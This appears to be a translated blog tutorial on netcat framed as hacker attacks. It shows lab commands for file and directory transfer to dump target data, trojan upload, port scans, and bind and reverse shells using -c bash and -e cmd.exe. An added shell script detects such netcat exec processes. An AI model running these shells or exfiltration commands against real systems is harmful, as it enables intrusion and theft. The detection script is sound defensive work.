Hacker attacks: understanding Netcat

Netcat is nicknamed the "Swiss Army knife".
It is small but packs in a lot of functions: listening, transfer, telnet, banner grabbing, text file transfer, encryption, remote control, streaming media, and remote disk cloning.
It is installed on almost every Linux system; simply type nc in a shell to see whether it is there.

nc

Format: nc [parameters] ip port [file]
Parameters:
-v: verbose output
-n: do not resolve DNS
-l: listen
-p: port
-q: disconnect after the command finishes; followed by a time value
Demo: how to upload a trojan with nc
ubuntu server: run nc -lp 4444 > 1.txt

nc -lp 4444 > 1.txt

kali: run nc -nv 192.168.176.144 4444 < 1.txt

nc -nv 192.168.176.144 4444 < 1.txt -q 1

Alternatively:
kali: run nc -lp 4444 < 2.txt -q 1

nc -lp 4444 < 2.txt -q 1

ubuntu server: run nc -nv 192.168.176.129 4444 > 2.txt

nc -nv 192.168.176.129 4444 > 2.txt

Transferring a directory:
This can be used to dump data from the target server or to upload an exploit.
kali: run tar -cvf - MITMF/ | nc -lp 4444 -q 1
The directory is packed with tar first.

tar -cvf - MITMF/ | nc -lp 4444 -q 1

ubuntu server: run nc -nv 192.168.176.129 4444 | tar -xvf -

nc -nv 192.168.176.129 4444 | tar -xvf -

Transfer succeeded:

ls

Encrypted file transfer
kali: run nc -lp 444 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 3.txt
mcrypt is the encryption tool; --flush deletes after decryption, -Fbqd are the decryption options, rijndael-256 is the encryption algorithm, and the mode is set with -m ecb.

nc -lp 444 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 3.txt

ubuntu server: run mcrypt --flush -Fbq -a rijndael-256 -m ecb < 3.txt | nc -nv 192.168.176.129 444 -q 1 to encrypt the 3.txt file; -Fbq are the encryption options

mcrypt --flush -Fbq -a rijndael-256 -m ecb < 3.txt | nc -nv 192.168.176.129 444 -q 1

Streaming media service
kali: run cat 1.mp4 | nc -lp 4444

cat 1.mp4 | nc -lp 4444

ubuntu server: run nc -nv 192.168.176.129 4444 | mplayer -vo x11 -cache 3000 -
mplayer is a video player; it plays the data as a video stream with a cache size of 3000.

nc -nv 192.168.176.129 4444 | mplayer -vo x11 -cache 3000 -

NC scanner
Parameter: -z: scan mode, probes for open ports

nc -nvz 192.168.176.145 1-65535

-u: UDP port scan

nc -nvzu 192.168.176.145 1-1024

Remote control
Controlled host: nc -lp 4444 -c bash
-c: execute bash
Forward remote control:

nc -lp 4444 -c bash

kali: run nc -nv 192.168.176.145 4444

nc -nv 192.168.176.145 4444

Reverse remote control
kali: run nc -lp 4444

nc -lp 4444

Target server: run nc -nv 192.168.176.129 4444 -c bash

nc -nv 192.168.176.129 4444 -c bash

If you want to take control of a Windows machine,
change -c to -e and bash to cmd.exe.
Run on win7:

nc -lp 4444 -e cmd.exe

Run on kali to get access directly:

nc -nv 192.168.176.128 4444

A reverse connection is best: the target server runs nc -nv <attacking machine IP> <port> -e cmd.exe,
and the attacking machine opens a listener with nc -lp <port> before the command above is run.
Drawbacks of netcat
1. No authentication: a compromised machine you have obtained can easily be connected to by others.
2. No encrypted channel: it is exposed to ARP spoofing, man-in-the-middle attacks and sniffing.
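
Seen from the defended host, the -c/-e listeners and reverse connections in the remote control section show up in the process list. The following is an added example, not part of the original post: a filter that flags such netcat processes. The function names and the sample process list are constructed, and it assumes -c/-e mean "run a program", as they do in the commands on this page.

```shell
#!/bin/sh
# Added example: flag netcat processes that were started with an exec option.
# Input (stdin): "PID ARGS..." lines as printed by `ps -eo pid=,args=`.
# Output: "<pid> <bind|reverse> <command line>" for every hit.
# Assumes -c/-e mean "run a program", as in the commands on this page.
flag_nc_shells() {
    awk '
    {
        is_nc = 0; exec_opt = 0; listen = 0
        for (i = 2; i <= NF; i++) {
            tok = $i
            if (i == 2) {
                # Only the program name (directory stripped) decides.
                sub(/^.*\//, "", tok)
                if (tok != "nc" && tok != "ncat" && tok != "netcat") break
                is_nc = 1
                continue
            }
            if (tok == "--exec" || tok == "--sh-exec") exec_opt = 1
            else if (tok == "--listen") listen = 1
            else if (tok ~ /^-[A-Za-z]+$/) {
                # -e and -c take an argument, so they end an option cluster.
                if (tok ~ /[ec]$/) exec_opt = 1
                if (tok ~ /l/) listen = 1
            }
        }
        if (is_nc && exec_opt) {
            cmd = $0
            sub(/^[ \t]*[0-9]+[ \t]+/, "", cmd)
            print $1, (listen ? "bind" : "reverse"), cmd
        }
    }'
}

# Constructed sample process list, reusing command lines from this page.
sample_ps() {
    cat <<'EOF'
 1201 nc -lp 4444 -c bash
 1377 nc -nv 192.168.176.129 4444 -c bash
 1420 nc -nvz 192.168.176.145 1-65535
 1433 /bin/nc -lp 4444
 1502 tar -cvf - MITMF/
EOF
}

sample_ps | flag_nc_shells
```

On a live host, feed it with ps -eo pid=,args= | flag_nc_shells.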


Origin blog.csdn.net/qq_44902875/article/details/104556046